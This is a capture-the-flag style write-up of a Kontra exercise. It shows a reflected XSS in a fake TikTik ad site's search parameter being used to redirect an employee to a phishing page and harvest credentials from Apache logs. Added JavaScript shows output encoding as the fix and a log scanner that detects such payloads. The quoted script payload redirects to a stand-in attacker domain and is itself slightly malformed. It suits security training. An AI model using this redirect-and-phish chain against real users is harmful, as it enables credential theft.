Tiktok XSS

Last updated 4 years ago

This exercise can be found under Kontra.

Per cyberpoint's research on Tiktok, an XSS vulnerability was found that could allow motivated threat actors to gain access to adversaries' Ad campaigns via reflected XSS.

XSS Exercise

We were introduced to a fake website called TikTik. The goal was to exploit the search function to route an employee of the targeted news company to a fake phishing page, so that we could obtain their password and get the targeted company's Ad campaign data.

We find the help page (https://ads.tiktik.com) and find that the search function has a reflected XSS in the search term: the web app echoes the input back in the response (?q=xxx). We used the following payload:

<script>document.location('fakewebsite.com')</script>

and sent an email to the employee to have them click the link, which routes them to the crafted site.
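As an added example (not code from the write-up or from Kontra), the following JavaScript models the reflected ?q= echo described above in its vulnerable form beside a hardened version that entity-encodes the term before placing it in the page. The function names and the result-page markup are assumptions for this illustration; the payload string is the one quoted in the write-up.

```javascript
// Added example: a minimal model of a help-page search endpoint that reflects
// the ?q= parameter into its HTML, vulnerable and hardened side by side.
// Function names and page markup are assumptions made for this illustration.

// The payload quoted in the write-up, as it would arrive in the q parameter.
const PAYLOAD = "<script>document.location('fakewebsite.com')</script>";

// Vulnerable: the search term is concatenated straight into the response body,
// so any markup in it becomes part of the page.
function renderSearchVulnerable(q) {
  return `<h1>Results for: ${q}</h1>`;
}

// Entity-encode the characters that let text break out of an HTML text node
// or attribute value. Output encoding is the standard fix for reflected XSS
// when user input has to appear inside HTML.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: same page, but the term is encoded before it is placed in markup.
function renderSearchSafe(q) {
  return `<h1>Results for: ${escapeHtml(q)}</h1>`;
}

// Extract q the way the endpoint would; searchParams.get() undoes the
// percent-encoding, so the check below runs on the decoded term.
function searchTermFromUrl(url) {
  return new URL(url).searchParams.get("q") ?? "";
}

// True if the rendered page contains a live <script> element, i.e. the
// reflection turned input into executable markup.
function containsScriptTag(html) {
  return /<script\b[^>]*>/i.test(html);
}

// Constructed request against the write-up's fake TikTik help page.
const REQUEST = "https://ads.tiktik.com/help?q=" + encodeURIComponent(PAYLOAD);
const term = searchTermFromUrl(REQUEST);
console.log("vulnerable reflects script:", containsScriptTag(renderSearchVulnerable(term)));
console.log("hardened reflects script:  ", containsScriptTag(renderSearchSafe(term)));
```

Encoding has to match the context the value lands in: escapeHtml covers text nodes and quoted attribute values, but a term placed inside a script block or a URL needs that context's own encoding, and a Content-Security-Policy that disallows inline script is a useful second layer if the encoding is ever missed.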

In order for this attack to happen, the attacker must own the fakewebsite domain and have a publicly accessible server.

On the server hosting the website, the following command starts the server and shows connection logs:

service apache2 start && tail -f /var/log/apache2/access.log

Once the targeted user enters their username and password on the phishing site, we obtain the credentials through the web server's logs.
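From the defender's side, the same reflection leaves a trace in the targeted site's own web-server access log. The following JavaScript is an added example (not from the write-up or from Kontra) that parses Apache combined-format log lines and flags requests whose q parameter carries markup. The log lines are constructed for this illustration, with the write-up's payload on one of them, and the function names are assumptions.

```javascript
// Added example: detect reflected-XSS attempts against a ?q= search endpoint
// by reading the target site's access log. Log lines below are constructed;
// the format is Apache's default combined log format.

const SAMPLE_LOG = [
  '203.0.113.5 - - [10/Jan/2020:10:00:01 +0000] "GET /help?q=campaign+reports HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
  '203.0.113.5 - - [10/Jan/2020:10:00:07 +0000] "GET /help?q=%3Cscript%3Edocument.location(%27fakewebsite.com%27)%3C%2Fscript%3E HTTP/1.1" 200 1601 "-" "Mozilla/5.0"',
  '198.51.100.9 - - [10/Jan/2020:10:01:13 +0000] "GET /help?q=price+%3C+100 HTTP/1.1" 200 1540 "-" "Mozilla/5.0"',
  '198.51.100.9 - - [10/Jan/2020:10:02:40 +0000] "GET /help?q=100%25+rebate HTTP/1.1" 200 1540 "-" "Mozilla/5.0"',
].join("\n");

// ip, ident, user, [timestamp], "METHOD target PROTO", status, bytes
const LOG_LINE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)/;

function parseAccessLogLine(line) {
  const m = LOG_LINE.exec(line);
  if (!m) return null;
  return { ip: m[1], time: m[2], method: m[3], target: m[4], status: Number(m[5]) };
}

// Decode one query parameter from the request target. A relative target needs
// a base URL to parse; the host used here is a placeholder and never contacted.
function queryParam(target, name) {
  return new URL(target, "http://placeholder.invalid").searchParams.get(name);
}

// Patterns that mean the search term would be interpreted as markup if echoed
// unencoded. "<" followed by a tag name or comment opener counts; a bare "<"
// in text such as "price < 100" does not, which keeps false positives down.
const MARKUP_PATTERNS = [
  { name: "html-tag", re: /<\s*\/?[a-z!]/i },
  { name: "javascript-uri", re: /javascript\s*:/i },
  { name: "event-handler", re: /\bon[a-z]+\s*=/i },
];

// Return the name of the first matching pattern, or null for a benign term.
function classifySearchTerm(q) {
  if (q == null) return null;
  for (const p of MARKUP_PATTERNS) {
    if (p.re.test(q)) return p.name;
  }
  return null;
}

// Scan a whole log and collect the requests worth an analyst's attention.
function findReflectedXssAttempts(logText, param = "q") {
  const hits = [];
  for (const line of logText.split("\n")) {
    const rec = parseAccessLogLine(line);
    if (!rec) continue;
    const q = queryParam(rec.target, param);
    const reason = classifySearchTerm(q);
    if (reason) hits.push({ ip: rec.ip, time: rec.time, q, reason });
  }
  return hits;
}

for (const hit of findReflectedXssAttempts(SAMPLE_LOG)) {
  console.log(`${hit.time} ${hit.ip} ${hit.reason}: ${hit.q}`);
}
```

Decoding before matching matters: the payload only ever appears percent-encoded in the log, so a rule that greps the raw line for "<script" never fires. A 200 status on the flagged request is also worth noting, because it shows the server rendered the reflected term rather than rejecting it.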
